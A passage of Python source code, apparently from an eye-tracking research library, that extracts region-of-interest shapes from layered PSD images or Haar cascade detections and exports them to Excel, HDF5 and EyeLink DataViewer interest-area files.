self.figure_title_fontsize = kwargs['figure_title_fontsize'] if 'figure_title_fontsize' in kwargs else 12
plt.rcParams.update({
#dpi
'figure.dpi': self.dpi,
#font
'ytick.labelsize': self.axis_tick_fontsize,
'xtick.labelsize': self.axis_tick_fontsize,
'axes.titlesize': self.axis_title_fontsize,
'figure.titlesize': self.figure_title_fontsize
})
self.rcParams = kwargs['rcParams'] if 'rcParams' in kwargs else matplotlib.rcParams
if self.rcParams is not None: plt.rcParams.update(self.rcParams)
#-----classifiers
import yaml
if ('classifiers' in kwargs) and (kwargs['classifiers'] != 'default'):
self.classifiers = kwargs['classifiers']
else:
with open('%s/dist/roi/classifiers.yaml'%(self.path), 'r') as _file:
self.classifiers = yaml.safe_load(_file)
for item in self.classifiers:
self.classifiers[item]['path'] = '%s/%s'%(self.path, self.classifiers[item]['path'])
#-----colors
self.hex = ['#2179F1','#331AE5','#96E421','#C56D88','#61CAC5','#4980EC','#2E3400','#E0DB68','#C4EC5C','#D407D7','#FBB61B',
'#067E8B','#76A502','#0AD8AB','#EAF3BF','#D479FE','#3B62CD','#789BDD','#7F141E','#949CBE']
self.rgb = [(102,12,15),(153,3,8),(179,47,45),(229,28,35),(242,216,167),(255,255,153),(255,255,77),(242,132,68),(242,141,119),
(150,217,184),(85,217,153),(16,187,111),(54,140,98),(96,154,191),(64,112,160),(33,150,243),(43,71,171),(165,140,255),
(217,35,237),(97,18,179)]
#----shape
# check if trying to do complex ROI using dataviewer
if (self.shape in ['polygon', 'hull']) and (self.roi_format == "dataviewer"):
raise Exception ("Cannot use shape %s when exporting for DataViewer. \
Please use either 'circle', 'rotate', or 'straight' instead, or set roi_format == 'raw'."%(shape))
#----directory
self.filetype = filetype.strip('.')
if self.isDemo is True:
self.image_path = "%s/dist/roi/raw/1/"%(self.path)
self.output_path = "%s/dist/roi/output/"%(self.path)
metadata_source = "%s/dist/roi/raw/1/metadata.xlsx"%(self.path)
else:
self.image_path = image_path
self.output_path = output_path
# if no image path and not demo
if self.image_path is None:
error = "No valid image path found. Please make sure to include an image path. If you wish to run a demo, please set isDemo=True."
raise Exception(error)
else:
# set directory of files
self.directory = [x for x in (Path(self.image_path).glob("*.%s"%(filetype.lower())) or Path(self.image_path).glob("*.%s"%(filetype.upper())))]
## if no files in directory, raise exception
if not self.directory:
error = "No %s images in path: %s. Please make sure to include an image path. \
If you wish to run a demo, please set isDemo=True."%(filetype, self.image_path)
raise Exception(error.replace("\t",""))
#----read metadata file (if metadata is not None)
if metadata_source != "embedded":
self.metadata_source = metadata_source
_type = Path(self.metadata_source).suffix
if _type == ".csv": self.metadata_all = pd.read_csv(self.metadata_source)
elif _type == ".xlsx": self.metadata_all = pd.read_excel(self.metadata_source)
# convert to string
self.metadata_all = self.metadata_all.astype(str)
# check if metadata is empty
if self.metadata_all.empty:
raise Exception('No data for file: %s'%(self.metadata_source))
@classmethod
def extract_metadata(cls, imagename, imgtype, layer):
"""Extract metadata for each region of interest.
Parameters
----------
imagename : :obj:`str`
Image file name (without extension).
imgtype : :obj:`str`
Image type (e.g. 'psd').
layer : :obj:`object`
Layer object (e.g. a psd_tools layer) containing the region of interest.
Returns
-------
metadata : :obj:`pandas.DataFrame`
Metadata for the region of interest.
roiname : :obj:`str`
Name of the region of interest.
"""
#----prepare metadata
# if metadata is stored in image files directly
if cls.metadata_source == 'embedded':
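## note: for example, a layer named "name=roi1;feature=lefteye" (with the default ';' delimiter)
## is parsed into a key/value DataFrame, and the leading "roi" is stripped from the name below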
metadata = pd.DataFrame(data=(item.split("=") for item in layer.name.split(cls.delimiter)),columns=['key','value'])
metadata.set_index('key', inplace=True)
metadata.loc['name']['value'] = metadata.loc['name']['value'].replace("roi","")
roiname = metadata.loc['name']['value']
# else read metadata from file
else:
# get metadata
if imgtype=='psd':
roiname = layer.name.strip(' \t\n\r') # strip whitespace
metadata = cls.metadata_all.loc[(cls.metadata_all['image'] == imagename) & (cls.metadata_all['roi'] == roiname)]
else:
roiname = imagename
##!!! TODO: Resolve metadata for non-layered images
metadata = cls.metadata_all.loc[(cls.metadata_all['image'] == imagename)]
# if datafame empty
if metadata.empty:
message = 'No data for %s:%s (image:roi).'%(imagename, roiname)
raise Exception(message)
# print results
if cls.isDebug:
cls.console('## roiname: %s'%(roiname),'green')
return metadata, roiname
@classmethod
def format_image(cls, image=None, imgtype='psd', isRaw=False, isPreprocessed=False, isNormal=False, isHaar=False):
"""Resize image and reposition image, relative to screensize.
Parameters
----------
image : :obj:`None`, :class:`PIL.Image.Image`, or `psd_tools.PSDImage <https://psd-tools.readthedocs.io/en/latest/reference/psd_tools.html#psd_tools.PSDImage>`__
The image (or layered Photoshop PSD/PSB file object) to format. A PSD file should include one layer for each region of interest. Default is None.
imgtype : :obj:`str` {'psd','dcm','tiff', 'bitmap'}
Image type.
isRaw : :obj:`bool`, optional
If **True**, the image will be returned without resizing or being placed on top of a background image. Default is **False**.
isPreprocessed : :obj:`bool`, optional
If **True**, the image will be resized and placed on top of an opaque background image. Default is **False**.
isNormal : :obj:`bool`, optional
If **True**, the image will be resized and placed on top of a transparent background (used for individual ROI layers). Default is **False**.
isHaar : :obj:`bool`, optional
If **True**, the image is already a :class:`PIL.Image.Image` (haarcascade path) and will not be converted from PSD. Default is **False**.
Attributes
----------
image : :class:`PIL.Image.Image`
PIL image object class.
Returns
-------
image, background : :class:`PIL.Image.Image`
PIL image object class.
"""
## load image from PSD, DICOM, tiff, or bitmap as PIL
if imgtype == 'psd':
if not isHaar: image = image.topil()
else: image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'DICOM':
image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'tiff':
image = image
imagesize = [image.size[0], image.size[1]]
elif imgtype == 'bitmap':
image = image
imagesize = [image.size[0], image.size[1]]
# if returning raw image
if isRaw:
if cls.isDebug: cls.console('# export raw image','blue')
return image, imagesize
# if returning raw image
elif isPreprocessed:
## set background
screen_size = cls.screensize
background = Image.new("RGBA", (screen_size), (110, 110, 110, 255))
if cls.isDebug: cls.console('# export preprocessed image','blue')
elif isNormal:
## set background
screen_size = cls.screensize
background = Image.new("RGBA", (screen_size), (0, 0, 0, 0))
if cls.isDebug: cls.console('# export roi image','blue')
# scale and move image to emulate stimulus presentation
if isPreprocessed or isNormal:
# if scale image
if cls.scale != 1:
old_imagesize = [image.size[0], image.size[1]]
imagesize = [int(image.size[0] * cls.scale), int(image.size[1] * cls.scale)]
image = image.resize(tuple(imagesize))
if cls.isDebug:
cls.console('image size: %s, scaled to: %s'%(old_imagesize, imagesize))
# else unscaled
else:
imagesize = [int(image.size[0]), int(image.size[1])]
if cls.isDebug: cls.console('image size: %s'%(imagesize))
# if offsetting
if cls.newoffset:
offset_center = cls.recenter
# calculate upper-left coordinate for drawing into image
x = ((offset_center[0]) - (imagesize[0]/2)) # x-bound <offset_x center> - <1/2 image_x width>
y = (offset_center[1]) - (imagesize[1]/2) # y-bound <offset_y center> - <1/2 image_y width>
left_xy = (int(x),int(y))
if cls.isDebug: cls.console('image centered at: %s'%(offset_center))
# else not offsetting
else:
# calculate upper-left coordinate for drawing into image
x = (screen_size[0]/2) - (imagesize[0]/2) # x-bound <screen_x center> - <1/2 image_x width>
y = (screen_size[1]/2) - (imagesize[1]/2) # y-bound <screen_y center> - <1/2 image_y width>
left_xy = (int(x),int(y))
if cls.isDebug: cls.console('image centered at: %s'%([screen_size[0]/2,screen_size[1]/2]))
# draw
background.paste(image, left_xy)
return background, imagesize
@classmethod
def extract_contours(cls, image, imagename, roiname):
"""[summary]
Parameters
----------
image : [type]
[description]
imagename : [type]
[description]
roiname : [type]
[description]
Returns
-------
[type]
[description]
Raises
------
Exception
[description]
Exception
[description]
"""
def store(image, colors):
# post: prepare for export
img = Image.fromarray(image)
img = img.convert("RGBA")
pixdata = img.load() # allow PIL processing
width, height = img.size
color = random.choice(cls.rgb) # apply color to ROI
# store shape
for y in range(height):
for x in range(width):
# convert background to transparent
if pixdata[x, y] == (255, 255, 255, 255):
pixdata[x, y] = (255, 255, 255, 0)
# convert forground to color
elif pixdata[x, y] == (0, 0, 0, 255):
pixdata[x, y] = color
# store coordinates for ROI export (ias, xlsx)
coord.append([x,y])
# close editing PIL image
#img.close()
return coord, img
# convert pil image to grayscale (using PIL)
#image = image.convert(mode='L')
#imagesize = [image.size[0], image.size[1]]
## convert to np.array
#image = np.array(image)# image.shape: height x width x channel
# or convert pil image to grayscale (using cv2)
# paste image to white background, convert to RGB
size = image.size
image.load()
image_RGB = Image.new("RGB", size=size, color=(255, 255, 255))
image_RGB.paste(image, mask=image.split()[3])
## invert image
image_invert = ImageOps.invert(image_RGB)
## convert to numpy
image_np = np.array(image_invert)
## convert to greyscale
image_gray = cv2.cvtColor(image_np, cv2.COLOR_BGR2GRAY)
# if drawing in PSD files
if cls.isDebug: cls.console('manual ROI detection','blue')
# threshold the image
## note: any pixel with a value above the threshold (thresh=1) is assigned 255, converting the image to black/white for contour detection
_retval, threshold = cv2.threshold(src=image_gray, thresh=1, maxval=255, type=0)
# find contours in image
## note: if you only want to retrieve the most external contour # use cv.RETR_EXTERNAL
contours, _hierarchy = cv2.findContours(threshold, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# if contours empty raise Exception
if not bool(contours):
_err = [imagename, roiname, 'Not able to identify contours']
message = '%s; %s; %s'%(_err[0],_err[1],_err[2])
raise Exception(message)
#------------------------------------------------------------------------for each layer: save images and contours
#when saving the contours below, only one drawContours function from above can be run
#any other drawContours function will overlay on the others if multiple functions are run
#----param
s_color = [(91,150,190,255), (247,222,168,255), (33,150,243,255), (229,28,35,255)]
image_blank = np.full_like(image_gray, 255) ## Return an array of x with the same shape and type as a given array.
coord = [] #store shape of each contour: approx polygon, circle, etc.
#breakpoint()
#----straight bounding box
if cls.shape == 'straight':
# cls.console('## roishape: straight bounding box','green')
cls.shape_d = 'RECTANGLE' # dataviewer shape
# contour
cnt = contours[0]
# get bounds
_x,_y,_w,_h = cv2.boundingRect(cnt)
# convert all coordinates floating point values to int
roi_bounds = np.int0(cv2.boxPoints(cv2.minAreaRect(cnt)))
# draw an individual contour
cv2.rectangle(img=image_blank, pt1=(_x,_y), pt2=(_x+_w,_y+_h), color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----rotated bounding box
elif cls.shape == 'rotated':
# cls.console('## roishape: rotated bounding box','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
# get bounds
rect = cv2.minAreaRect(cnt)
roi_bounds = cv2.boxPoints(rect)
# convert all coordinates floating point values to int
roi_bounds = np.int0(roi_bounds)
# draw an individual contour
cv2.drawContours(image=image_blank, contours=[roi_bounds], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----circle enclosing
elif cls.shape == 'circle':
# cls.console('## roishape: bounding circle','green')
cls.shape_d = 'ELLIPSE' # dataviewer shape
# contour
cnt = contours[0]
# get minimal enclosing circle
(_x,_y),_r = cv2.minEnclosingCircle(cnt)
# convert all coordinates floating point values to int
roi_bounds = np.int0(cv2.boxPoints(cv2.minAreaRect(cnt)))
# get center and radius of circle
center = (int(_x),int(_y))
radius = int(_r)
# draw an individual contour
cv2.circle(img=image_blank, center=center, radius=radius, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = roi_bounds
# create contours
_contours = image_contours
#----Contour Approximation
elif cls.shape == 'polygon':
# cls.console('## roishape: approximate polygon','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
_epsilon = 0.01 * cv2.arcLength(cnt, True)
# get approx polygons
polygon = cv2.approxPolyDP(curve=cnt, epsilon=_epsilon, closed=True)
# draw approx polygons
cv2.drawContours(image=image_blank, contours=[polygon], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = polygon[:,0,:]
# create contours
_contours = image_contours
#----convex hull
elif cls.shape == 'hull':
# cls.console('## roishape: hull','green')
cls.shape_d = 'FREEHAND' # dataviewer shape
# contour
cnt = contours[0]
# get convex hull
hull = cv2.convexHull(cnt)
# draw hull
cv2.drawContours(image=image_blank, contours=[hull], contourIdx=-1, color=(0,0,0), thickness=cv2.FILLED)
# create coords, prepare for visualization of ROIs
coord, image_contours = store(image_blank, s_color)
# create bounds
_bounds = hull[:,0,:]
# create contours
_contours = image_contours
#----no shape chosen
else:
raise Exception('Please select either straight, rotated, circle, polygon, or hull shape.')
#cls.console('test4.6', 'red')
return _bounds, _contours, coord
@classmethod
def format_contours(cls, imagename, metadata, roiname, roinumber, bounds, coords):
"""[summary]
Parameters
----------
imagename : [type]
[description]
metadata : [type]
[description]
roiname : [type]
[description]
roinumber : [type]
[description]
roilabel : [type]
[description]
bounds_ : [type]
[description]
contours_ : [type]
[description]
Returns
-------
[type]
[description]
[type]
[description]
Raises
------
Exception
[description]
"""
# contour bounds
## store bounds as df
bounds_ = pd.DataFrame(bounds)
## transpose bounds (x0, y0, x1, y1)
x_ = bounds_[0].unique().tolist()
y_ = bounds_[1].unique().tolist()
## check if bounding box has two x and y coordinate pairs
if (((len(x_) == 1) or (len(y_) == 1)) and cls.shape == 'straight'):
raise Exception ("Error creating bounding box for image:roi %s:%s."%(imagename, roiname))
## set as df
bounds = pd.DataFrame(np.column_stack([x_[0],y_[0],x_[1],y_[1]]))
## rename
bounds.columns = ['x0','y0','x1','y1']
## add index, image, roi, and shape
bounds['image'] = imagename
bounds['roi'] = roiname
bounds['id'] = roinumber
bounds['shape_d'] = cls.shape_d
## convert to int
bounds[['x0','y0','x1','y1']] = bounds[['x0','y0','x1','y1']].astype(int)
#contour coords
coords = pd.DataFrame(coords, columns = ['x','y'])
coords[['image','roi','shape']] = pd.DataFrame([[imagename, roiname, cls.shape]], index=coords.index)
#----save roi df
# combine metadata with bounds
if metadata is not None:
bounds = pd.merge(bounds, metadata, on=['image','roi'], how='outer')
# finish
return bounds, coords
@classmethod
def draw_contours(cls, filepath, img=None):
"""[summary]
Parameters
----------
filepath : :obj:`str`
Path the contour image will be saved to (used here to create the output folder and for the debug message).
img : :class:`PIL.Image.Image`, optional
Contour image to draw with :obj:`matplotlib.pyplot`, by default None
"""
# convert pil to np
img_np = np.array(img)
plt.imshow(img_np)
## check folder
filepath_ = Path(filepath).parent
if not os.path.exists(filepath_):
os.makedirs(filepath_)
## save
if cls.isDebug: cls.console('## image saved @: %s'%(filepath),'blue')
@classmethod
def export_data(cls, df, path, filename, uuid=None, newcolumn=None, level='image'):
"""[summary]
Parameters
----------
df : [type]
Bounds.
path : [type]
[description]
filename : [type]
[description]
uuid : [type], optional
[description], by default None
newcolumn : [type], optional
[description], by default None
level : :obj:`str` {'image', 'all'}
Whether data is being exported for a single image (**image**) or for all images combined (**all**). Default is **image**.
Returns
-------
[type]
[description]
"""
#if working with a single image
if level == 'image':
# if new column is not None and level == image
if (isinstance(newcolumn, (dict,))):
df[list(newcolumn.keys())[0]] = list(newcolumn.values())[0]
# if uuid, create a unique column
if isinstance(uuid, (list,)):
df['uuid'] = df[uuid].apply(lambda x: ''.join(x), axis=1)
uuid_column = 'uuid'
# else simply use roiname
else:
uuid_column = cls.roicolumn
#else if working with all images
elif level == 'all':
# if uuid, create a unique column
if isinstance(uuid, (list,)):
uuid_column = 'uuid'
# else simply use roiname
else:
uuid_column = cls.roicolumn
# check if folder exists
if not os.path.exists(path):
os.makedirs(path)
# export to excel
if ((cls.roi_format == 'raw') or (cls.roi_format == 'both')):
#if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.xlsx"%(path, filename, cls.append_output_name))
else:
filepath = Path("%s/%s.xlsx"%(path, filename))
#save
df.to_excel("%s"%(filepath), index=False)
# if debug
if cls.isDebug: cls.console("## raw data saved @: %s"%(filepath),'green')
# export to ias (dataviewer)
if ((cls.roi_format == 'dataviewer') or (cls.roi_format == 'both')):
#if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.ias"%(path, filename, cls.append_output_name))
else:
filepath = Path("%s/%s.ias"%(path, filename))
_bounds = '\n'.join(map(str, [
"# EyeLink Interest Area Set created on %s."%(cls.now()),
"# Interest area set file using imhr.eyetracking.ROI()",
"# columns: RECTANGLE | IA number | x0 | y0 | x1 | y1 | label",
"# example: RECTANGLE 1 350 172 627 286 leftcheek",
"# columns: ELLIPSE | IA number | x0 | y0 | x1 | y1 | label",
"# example: ELLIPSE 2 350 172 627 286 leftcheek",
"# columns: FREEHAND | IA number | x0,y0 | x1,y1 | x2,y2 | x3,y3 | label",
"# example: FREEHAND 3 350,172 627,172 627,286 350,286 leftcheek",
"# For more information see Section 5.10.1 of Eyelink DataViewer Users Manual (3.2.1).",
df[['shape_d','id','x0','y0','x1','y1',uuid_column]].to_csv(index=False, header=False).replace(',', ' ')
]))
# save to ias
with open("%s"%(filepath), "w") as file:
file.write(_bounds)
# if debug
if cls.isDebug: cls.console("## dataviewer data saved @: %s"%(filepath),'green')
return df
@classmethod
def manual_detection(cls, directory, core=0, queue=None):
"""[summary]
Parameters
----------
directory : :obj:`list`
[description]
core : :obj:`int`
(if isMultiprocessing) Core used for this function. Default is **0**.
queue : :obj:`queue.Queue`
Constructor for a multiprocessing 'first-in, first-out' queue. Note: Queues are thread and process safe.
Returns
-------
[type]
[description]
"""
#----prepare lists for all images
l_bounds_all = []
l_contours_all = []
l_coords_all = []
l_error = []
#!!!----for each image
cls.console('starting()','purple')
if cls.isDebug: cls.console('for each image','purple')
for file in directory:
# console
if cls.isDebug and cls.isMultiprocessing: cls.console('core: %s'%(core),'orange')
# defaults
imgtype='psd'
# read image
ext = (Path(file).suffix).lower()
## if psd
if ext == '.psd':
imgtype = 'psd'
layered_image = psd_tools.PSDImage.open(file)
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if DICOM (GIMP)
##!!! TODO: get working
elif ext == '.dcm':
breakpoint()
imgtype = 'DICOM'
layered_image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
else:
error = "Image format not valid. Acceptable image formats are: psd (Photoshop) or dcm (DICOM)."
raise Exception(error)
# clear lists
l_bounds = [] #list of bounds (data)
l_contours = [] #list of contours (image)
l_coords = [] #list of coordinates (data)
#!!!----for each image, save image file
# raw image
image, imagesize = cls.format_image(image=layered_image, imgtype=imgtype, isRaw=True)
## check folder
_folder = '%s/img/raw/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# preprocessed image (image with relevant screensize and position)
image, imagesize = cls.format_image(image=layered_image, imgtype=imgtype, isPreprocessed=True)
## check folder
_folder = '%s/img/preprocessed/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
#!!!----for each region of interest
## counter
roinumber = 1
## check path
_folderpath = '%s/img/bounds/roi/'%(cls.output_path)
if not os.path.exists(_folderpath):
os.makedirs(_folderpath)
## for each layer in psd (if using psd)
#!!! TODO: get working for other image types (DICOM)
for layer in layered_image:
# skip if layer is main image
if ((imgtype=='psd') and (Path(layer.name).stem == imagename)):
continue
else:
#. Extract metadata for each region of interest.
metadata, roiname = cls.extract_metadata(imagename=imagename, layer=layer, imgtype=imgtype)
#. Resize PIL image and reposition image, relative to screensize.
image, imagesize = cls.format_image(image=layer, imgtype=imgtype, isNormal=True)
#. Extract cv2 bounds, contours, and coordinates from np.array(image).
bounds, contours, coords = cls.extract_contours(image=image, imagename=imagename, roiname=roiname)
#. Format contours as Dataframe, for exporting to xlsx or ias.
bounds, coords = cls.format_contours(imagename=imagename, metadata=metadata, roiname=roiname, roinumber=roinumber, bounds=bounds, coords=coords)
#. Draw contours
## if append_output_name
if not (cls.append_output_name is False):
filepath = '%s/img/bounds/roi/%s.%s_%s.png'%(cls.output_path, imagename, roiname, cls.append_output_name)
else:
filepath = '%s/img/bounds/roi/%s.%s.png'%(cls.output_path, imagename, roiname)
## save image
if cls.image_backend == 'PIL':
contours.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
cls.draw_contours(filepath=filepath, img=contours)
plt.title('Region of Interest')
plt.ylabel('Screen Y (pixels)')
plt.xlabel('Screen X (pixels)')
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
#. store processed bounds and contours to combine across image
l_bounds.append(bounds)
l_contours.append(contours)
l_coords.append(coords)
#. update counter
roinumber = roinumber + 1
#!!!----for each image
### if append_output_name
if not (cls.append_output_name is False):
filepath = Path('%s/img/bounds/%s_%s.png'%(cls.output_path, imagename, cls.append_output_name))
else:
filepath = '%s/img/bounds/%s.png'%(cls.output_path, imagename)
## save image
if cls.image_backend == 'PIL':
img_ = Image.new('RGBA', l_contours[0].size)
for c in l_contours:
#img_ = Image.blend(img_, c, 0.125)
img_.paste(c, mask=c)
# add opacity
img_.putalpha(110)
img_.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
[cls.draw_contours(filepath=filepath, img=cnt) for cnt in l_contours]
plt.title('Region of Interest')
plt.ylabel('Screen Y (pixels)')
plt.xlabel('Screen X (pixels)')
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# bounds
## concatenate and store bounds for all rois
df = pd.concat(l_bounds)
l_bounds_all.append(df)
## export data
_filename = "%s_bounds"%(imagename)
_folder = '%s/data/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
df = cls.export_data(df=df, path=_folder, filename=_filename, uuid=cls.uuid, newcolumn=cls.newcolumn, level='image')
# contours
# concatenate and store contours for all rois
df = pd.concat(l_coords)
l_coords_all.append(df)
## export data
_filename = "%s_contours"%(imagename)
_folder = '%s/data/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
filepath = Path("%s/%s.h5"%(_folder, _filename))
df.to_hdf("%s"%(filepath), key='df', format='table', mode='w', data_columns=['image','roi'])
#!!!----finished for all images
# store
## if multiprocessing, store in queue
if cls.isMultiprocessing:
queue.put(l_bounds_all) # note: put a single object; a second positional argument would be read as the queue's 'block' flag
pass
# if not multiprocessing, return
else:
return l_bounds_all, l_contours_all, l_coords_all, l_error
@classmethod
def haarcascade(cls, directory, core=0, queue=None):
"""[summary]
Parameters
----------
directory : [type]
[description]
core : int, optional
[description], by default 0
queue : [type], optional
[description], by default None
Returns
-------
[type]
[description]
Raises
------
Exception
[description]
"""
#!!!----for each image
cls.console('starting()','purple')
if cls.isDebug: cls.console('for each image','purple')
l_coords_all = []
l_error = []
for file in directory:
# console
if cls.isDebug and cls.isMultiprocessing: cls.console('core: %s'%(core),'orange')
# defaults
imgtype='psd'
# read image
ext = (Path(file).suffix).lower()
## if psd
if ext == '.psd':
imgtype = 'psd'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if DICOM (GIMP)
elif ext == '.dcm':
breakpoint()
imgtype = 'DICOM'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if tiff
elif ext in ['.tiff','.tif']:
breakpoint()
imgtype = 'tiff'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
## else if bitmap
elif ext in ['.bmp','.jpeg','.jpg','.png']:
imgtype = 'bitmap'
image = Image.open('%s'%(file))
imagename = os.path.splitext(os.path.basename(file))[0]
if cls.isDebug: cls.console('\n# file: %s'%(imagename),'green')
else:
error = "Image format not valid. Acceptable image formats are: psd (photoshop), dcm (DICOM), tiff (multiple layers), or png/bmp/jpg (bitmap)."
raise Exception(error)
# clear lists
l_coords = [] #list of coordinates (data)
#!!!----for each image, save image file
# raw image
image, imagesize = cls.format_image(image=image, imgtype=imgtype, isRaw=True, isHaar=True)
## check folder
_folder = '%s/img/raw/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# preprocessed image (image with relevant screensize and position)
image, imagesize = cls.format_image(image=image, imgtype=imgtype, isPreprocessed=True, isHaar=True)
## check folder
_folder = '%s/img/preprocessed/'%(cls.output_path)
if not os.path.exists(_folder):
os.makedirs(_folder)
## if append_output_name
if not (cls.append_output_name is False):
filepath = Path("%s/%s_%s.png"%(_folder, imagename, cls.append_output_name))
else:
filepath = '%s/%s.png'%(_folder, imagename)
## save raw
if cls.image_backend == 'PIL':
image.save(filepath)
else:
fig = plt.figure()
if cls.set_size_inches: fig.set_size_inches(cls.screensize[0]/cls.dpi, cls.screensize[1]/cls.dpi)
if cls.remove_axis: fig.tight_layout(pad=0); plt.axis('off')
if cls.tight_layout: plt.tight_layout()
plt.imshow(image, zorder=1, interpolation='bilinear', alpha=1)
plt.savefig(filepath, dpi=cls.dpi, bbox_inches='tight')
plt.close(fig)
# The image is read and converted to grayscale
cv2_image = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
gray = np.array(image.convert("L"))#; cv2.imwrite(greypath, gray)
# for each requested classifier
for ctype in cls.classifiers:
classifier = cls.classifiers[ctype]
## parameters
color = random.choice(cls.rgb)
cregion = classifier['type']
sF = classifier['scaleFactor']
minN = classifier['minNeighbors']
minS = tuple(classifier['minSize'])
thickness = classifier['thickness']
cpath_ = Path(classifier['path'])
## setup classifier
haar = cv2.CascadeClassifier('%s'%(cpath_))
## detect
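## note: scaleFactor sets how much the image is shrunk at each step of the detection pyramid,
## minNeighbors how many overlapping detections are needed to keep a candidate region,
## and minSize the smallest region (in pixels) that will be reported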
roi = haar.detectMultiScale(gray, scaleFactor=sF, minNeighbors=minN, minSize=minS, flags=cv2.CASCADE_SCALE_IMAGE)
for idx, (x, y, w, h) in enumerate(roi):
# store coords
l_coords.append([x, y, x + w, y + h, cregion, idx, imagename]) # x0, y0, x1, y1 of the detected region
# draw region
cv2.rectangle(img=cv2_image, pt1=(x,y), pt2=(x+w,y+h), color=color, thickness=thickness)
roi_gray = gray[y:y + h, x:x + w]
roi_color = cv2_image[y:y + h, x:x + w]
# save image
_folder = '%s/img/cascades/'%(cls.output_path)
_filepath = '%s/%s.png'%(_folder, imagename)
## check folder
if not os.path.exists(_folder):
os.makedirs(_folder)
## save
cv2.imwrite(_filepath, cv2_image)
# save data
_folder = '%s/data/'%(cls.output_path)
_filepath = '%s/%s_cascades.xlsx'%(_folder, imagename)
## check folder
if not os.path.exists(_folder):
os.makedirs(_folder)
## save
df = pd.DataFrame(l_coords, columns=['x0', 'y0', 'x1', 'y1', 'feature', 'id', 'image'])
df.to_excel(_filepath, index=False)
# store coords
l_coords_all.append(df)
#!!!----finished for all images
# store
## if multiprocessing, store in queue
if cls.isMultiprocessing:
queue.put(l_coords_all)
pass
# if not multiprocessing, return
else:
return l_coords_all, l_error
@classmethod
def process(cls):
"""[summary]
Returns
-------
[type]
[description]
"""
# prepare arguements and procedure
df = ''
# if multiprocessing, get total cores
if cls.isMultiprocessing:
import multiprocessing
#----get number of available cores
_max = multiprocessing.cpu_count() - 1
